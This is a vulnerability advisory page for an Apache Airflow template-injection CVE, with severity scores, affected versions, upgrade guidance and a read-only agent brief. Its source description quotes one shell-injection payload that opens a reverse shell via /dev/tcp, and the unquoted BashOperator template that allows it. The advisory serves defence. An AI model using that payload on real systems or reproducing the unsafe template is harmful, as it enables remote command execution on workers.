Skip to content

← Actionable
Critical, CVSS 9.1amended

Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine

CVE-2026-42252GHSA-c85c-g9wv-pph2

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (apache-airflow 3.2.2), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS
9.1 · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS
  • CVE-2026-42252: 0.38% estimated exploitation activity in the next 30 days; percentile 32.41 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bashcommand="echo value: {{ dagrun.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.cantrigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i & /dev/tcp/.../9999 0&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 3 · amended ·

    Amended from ghsa record GHSA-c85c-g9wv-pph2

  2. Revision 2 · amended ·

    Amended from osv record GHSA-c85c-g9wv-pph2

  3. Revision 1 · created ·

    Published from ghsa record GHSA-c85c-g9wv-pph2

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2026-42252

Advisory: Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine
IDs: CVE-2026-42252, GHSA-c85c-g9wv-pph2
Record: https://patchnext.com/advisories/cve-2026-42252 (revision 3, source checked 26 Oct 2026, 13:46 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: Critical (CVSS 9.1)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: apache-airflow 3.2.2. A vendor fix does not mean a deployment is fixed.

## Affected components
- PyPI apache-airflow: affected >= 3.0.0, < 3.2.2; fixed in 3.2.2

## Suggested inspection (read-only)
- `python -m pip show apache-airflow`: prints the installed version. Run with the environment that serves production active.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on apache-airflow.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-c85c-g9wv-pph2 (GitHub-reviewed advisory GHSA-c85c-g9wv-pph2 lists affected ranges: PyPI apache-airflow >=3.0.0 <3.2.2)
- Verified: https://osv.dev/vulnerability/GHSA-c85c-g9wv-pph2 (OSV record GHSA-c85c-g9wv-pph2 lists affected ranges: PyPI apache-airflow >=3.0.0 <3.2.2 (fixed))

Commands are suggestions: review each one before running it.

Loading voting…